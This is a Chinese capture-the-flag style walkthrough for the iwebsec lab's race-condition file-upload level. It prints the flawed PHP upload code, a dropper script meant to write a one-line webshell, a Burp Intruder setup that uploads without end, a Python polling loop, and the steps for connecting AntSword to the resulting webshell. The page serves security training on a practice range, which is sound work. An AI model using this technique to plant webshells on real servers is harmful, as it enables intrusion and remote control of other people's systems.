目录

第07关 条件竞争文件上传

1.打开靶场

2.源码分析

3.构造脚本

4.intruder死循环上传shell.php

5.写python脚本不断访问shell.php

6.渗透攻击

(1)运行python脚本

(2)intruder开始攻击

(3)等待python脚本访问成功

7.访问cmd.shell


第07关 条件竞争文件上传

通过对iwebsec靶场文件上传的第七关卡讲解条件竞争法实现文件上传的方法,通过python脚本配合burpsuite工具实现渗透过程。

1.打开靶场

iwebsec 靶场漏洞库iwebseciwebsec靶场 文件上传漏洞通关笔记7-竞争条件文件上传插图http://iwebsec.com:81/upload/07.php

iwebsec靶场 文件上传漏洞通关笔记7-竞争条件文件上传插图(1)

 随手构造info.php,内容为如下所示,提示该文件不允许删除已删除,提到删除应该是条件竞争类的文件上传漏洞iwebsec靶场 文件上传漏洞通关笔记7-竞争条件文件上传插图(2)

2.源码分析

如下所示,对于不在白名单中的文件类型,服务器直接删掉了




	
		条件竞争文件上传
	
	

条件竞争文件上传

请上传PHP文件

请上传文件:
<?php if (isset($_POST['submit'])){ $allow_ext = array("gif","png","jpg"); $uploaddir = 'uploads/'; $filename = $uploaddir.$_FILES['upfile']['name']; move_uploaded_file($_FILES['upfile']['tmp_name'],$filename); $file = "./".$filename; echo "文件上传成功: ".$file."
"; $ext = array_pop(explode(".",$_FILES['upfile']['name'])); if (!in_array($ext,$allow_ext)){ unlink($file); die("此文件类型不允许上传已删除"); } }else{ die(""); } ?>

3.构造脚本

构造脚本命名为shell.php,它的作用是生成一句话木马cmd.php,cmd.php的内容为

<?php
fputs (fopen("cmd.php","w"),'')
?>

 希望通过向服务器不停的上传shell.php脚本,在其未被删除前,利用条件竞争执行shell.php脚本生成一句话木马cmd.php

4.intruder死循环上传shell.php

(1)bp开启拦截模式

iwebsec靶场 文件上传漏洞通关笔记7-竞争条件文件上传插图(3)

 (2)浏览器上传shell.php

iwebsec靶场 文件上传漏洞通关笔记7-竞争条件文件上传插图(4)

 (3)bp抓包并发送给intruder

iwebsec靶场 文件上传漏洞通关笔记7-竞争条件文件上传插图(5)

(4)intruder中的positions处清除所有载荷

如下所示,点击clear

iwebsec靶场 文件上传漏洞通关笔记7-竞争条件文件上传插图(6)

 (5)intruder中的payload处选择1没有负载,无限重复

英文版bp如下

iwebsec靶场 文件上传漏洞通关笔记7-竞争条件文件上传插图(7)

 中文版bp如下

iwebsec靶场 文件上传漏洞通关笔记7-竞争条件文件上传插图(8)

5.写python脚本不断访问shell.php

根据第一次上传失败的提示得知文件上传后的路径为./uploads/info.php

iwebsec靶场 文件上传漏洞通关笔记7-竞争条件文件上传插图(9)

那么shell.php上传成功后,在没有被删掉前,其url访问路径为http://iwebsec.com:81/upload/uploads/shell.php

于是构造python脚本一直访问shell.php,利用时间差,不断访问使其可以在删除前生成cmd.php这个webshell,如下所示

import requests

url = "http://iwebsec.com:81/upload/uploads/shell.php" #这个路径,是上传的那个路径
while True:
    html = requests.get(url)
    if html.status_code == 200:
        print("OK")
        break
    else:
        print("NO")

6.渗透攻击

(1)运行python脚本

iwebsec靶场 文件上传漏洞通关笔记7-竞争条件文件上传插图(10)

(2)intruder开始攻击

点击攻击attack

iwebsec靶场 文件上传漏洞通关笔记7-竞争条件文件上传插图(11)

 如下所示bp开始不断上传shell.php

iwebsec靶场 文件上传漏洞通关笔记7-竞争条件文件上传插图(12)

 随机打开bp攻击中的response,可知intruder执行成功

iwebsec靶场 文件上传漏洞通关笔记7-竞争条件文件上传插图(13)

(3)等待python脚本访问成功

python访问成功,提示OK,代表已经生成了cmd.shell

iwebsec靶场 文件上传漏洞通关笔记7-竞争条件文件上传插图(14)

7.访问cmd.shell

蚁剑添加 url为http://iwebsec.com:81/upload/uploads/cmd.php 密码为cmd

iwebsec靶场 文件上传漏洞通关笔记7-竞争条件文件上传插图(15)

添加后如下所示

iwebsec靶场 文件上传漏洞通关笔记7-竞争条件文件上传插图(16)连接成功

iwebsec靶场 文件上传漏洞通关笔记7-竞争条件文件上传插图(17)

本站无任何商业行为
个人在线分享 » iwebsec靶场 文件上传漏洞通关笔记7-竞争条件文件上传
E-->